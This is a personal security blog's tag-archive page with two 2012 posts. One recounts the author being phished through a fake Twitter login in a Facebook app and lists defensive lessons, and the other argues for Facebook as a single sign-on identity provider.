Skip to primary content
Skip to secondary content

Joerg Asma

Joerg Asma's Security At a Glance

Joerg Asma

Main menu

  • Home
  • Joerg Asma’s Blog
  • Joerg Asma’s Social Network Link Collection

Tag Archives: Login

They got me!

Posted on November 29, 2012 by Joerg Asma
Reply

Being a security professional is sometimes a difficult thing. Everybody expects you to be wise in terms of security, threats, knowing all different kinds of attacks and so on.

Being phished yourself as a security pro will make people worry even more and they ask seriously how this could happen.

As mentioned before I was phished some days ago and I would like to give you my lessons learnt so that you might be slightly more carefully than I was.

How Was it Done?

I received a direct message from somebody I trust. A colleague. Usually phishing mails – or tweets –  are written in a way where you can see that something is wrong. Not in this case because what I learnt from his tweets is that he has a certain way of tweeting and accididentally his way of tweeting matched this direct message.

I was directed to a facebook app which seemed to show twitter videos – whatever that means. It looked like I was not logged into twitter so I tried to log in  – and my user account was captured.

Three days later somebody wrote direct messages to my twitter followers asking them to log on to the same web page. I saw that something was going on and changed my password so not all of my followers received this direct message and I sent out two public tweets saying that my account was phished.

What I could have done better?

It is a bad idea to enter social login credentials into an app. When using oauth the machine receives an access token and this may be used y application. There is no need to enter credentials any more. So use the native applications itself to authenticate and do not enter anything anywhere else.

I looked at the facebook application later and found that it looks really similar to the twitter login application. I reviewed the code of this application and saw that it was linked to an external webserver with a real strange name. That should have worried me.

My conclusion is: If I do not know a facebook app I should verify where it comes from and look at the code which tells you where the server is. The easiest way is when opening the sourcecode window of this website and then you will see the server name in the text edit headline. If it looks strange, stay away!

Two very simple things to make yourself more secure.

What did I do else?
You also should verify the apps that have a trust relationship with twitter just in case that anybody installed something there. If you don’t know an app, revoke its access.

Furthermore change ALL your passwords that have the same password as the phished application.

Last but not least: Communicate open that you have been a victim to stop the infection of your followers.

Advertisement
Posted in Joerg Asma, Social Networks | Tagged Facebook, Facebook Platform, Login, Online Communities, Phish, Social Networking, Twitter, User (computing) | Leave a reply

A theorie about securing passwords

Posted on September 15, 2012 by Joerg Asma
9

During the last years I was really impressed what happened with the internet. Maybe you don’t share my view but I got the impression that content is becoming richer. On the other hand the curators of these rich websites want to “own” the user by simply knowing him or her and ask new users to register.

There is nothing to complain about but there is no common sense on the internet about password complexity and you sometimes see really strange password rules for very simple content.

What happens? You register and you try to harmonize your passwords across different platforms. In the end you are not successful and have a couple of different login credentials you cannot remember at all. One day I counted my login credentials I have to login to different websites (Facebook, twitter, linked in, yahoo, google, banking, asalavista.net and so on). I stopped counting when I reached 30 websites with around 2 different login credentials. I am using a password safe I have written on my own, but others are using open source or public domain software without really knowing what it does with your passwords.

I believe it is a better idea to have one public authentication provider which is widely spread and that has a big interest in safeguarding the identity of the users.

I found a good article / infographic at gigya.com showing the market reach of Facebook, twitter, linkedin, yahoo and google.

It was no surprise to me that Facebook seems to have most of the users – and websites. But it was a surprised that Facebook already covers 37% of the business websites  seem to use Facebook connect. I started to review most of the websites I am using and found that most of them already have a facebook connect button and some are offering multiple login buttons (Facebook and twitter or Facebook and linkedin).

Think about the idea that you only login once into your Facebook account and the rest of the websites you use can use this authentication to identify you properly. I like that idea very much because it would help me to use one single and very complex password instead of dozensof passwords which are not that complex.

Some people might now say that it is not a good idea to use Facebook because they are considered to misbehave in terms of privacy and I fully agree with this. But for using Facebook as identity provider you do not need to tell them everything about yourself. You do not need to share pictures, do not need to press the like it button or need to connect to other people or use Facebook apps.

In the end I believe that there is hardly any other social website than Facebook that has this interest in maintaining the integrity of your digital identity. There is one simple reason: If they don’t know you, your profile has no value. The value of the entire Facebook profiles reflect the value of the Facebook brand. Remember Facebook’s IPO and you will understand what I mean.

Think about it! Mabe you’ll like the idea!

 

 

 

 

Posted in Big Picture, Cybersecurity, Joerg Asma, Social Networks | Tagged Digital identity, Facebook, Facebook Connect, LinkedIn, Login, Password, Security, Twitter | 9 Replies

Recent Posts

  • My Top 5 Predictions for 2015
  • Petersberger Gespräche im Livestream:Dig
  • #COUNTDOWN 10. Petersberger Gespräche: >

Enter your email address to follow this blog and receive notifications of new posts by email.

Join 292 other subscribers

Archive

Blogroll

  • Joerg Asma Brandyourself Profile
  • Joerg Asma on Klout
  • Joerg Asma's CV on resume up
  • Joerg Asma's Linkedin Profile
  • Joerg Asma's Xing Profile

The daily dose

  • Hm, wenn man die Erfahrung aus Israel ansieht, dann ist die Booster Impfung Alternativlos! @Karl_Lauterbach, was sa… twitter.com/i/web/status/1… 1 year ago
Follow @joerg_asma

Categories

  • Big Picture
  • Business Resilience
  • BYOD
  • Cloud Computing
  • Cybersecurity
  • Detection
  • Forensic
  • Georg Beham
  • Joerg Asma
  • Next Generation Security
  • Prevention
  • Social Networks

Tag Cloud

  • Advanced persistent threat
  • APT
  • Asset Based Security
  • Big Picture
  • Business
  • Business Resilience
  • BYOD
  • Cloud
  • Cloud Computing
  • Collateral damage
  • Computer forensics
  • Customer relationship management
  • Cyber Security
  • Cybersecurity
  • Cyberwarfare
  • Digital identity
  • Duqu
  • Facebook
  • Facebook Connect
  • Facebook Platform
  • Financial Statement
  • Flame
  • Incident management
  • Information Security
  • Insiders
  • IT service management
  • Joerg Asma
  • LinkedIn
  • Login
  • Marketing
  • Online Communities
  • Outsourcing
  • Password
  • Phish
  • Prediction
  • Security
  • Security Incident
  • security incidents
  • Service Quality
  • Social media
  • Social network
  • Social Networking
  • Social networking service
  • Social Networks
  • Stuxnet
  • Supervisory Board
  • Threats
  • Twitter
  • User (computing)

Stay tuned with RSS

RSS Feed RSS - Posts

RSS Feed RSS - Comments

Blog at WordPress.com.
Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy
  • Follow Following
    • Joerg Asma
    • Already have a WordPress.com account? Log in now.
    • Joerg Asma
    • Customize
    • Follow Following
    • Sign up
    • Log in
    • Report this content
    • View site in Reader
    • Manage subscriptions
    • Collapse this bar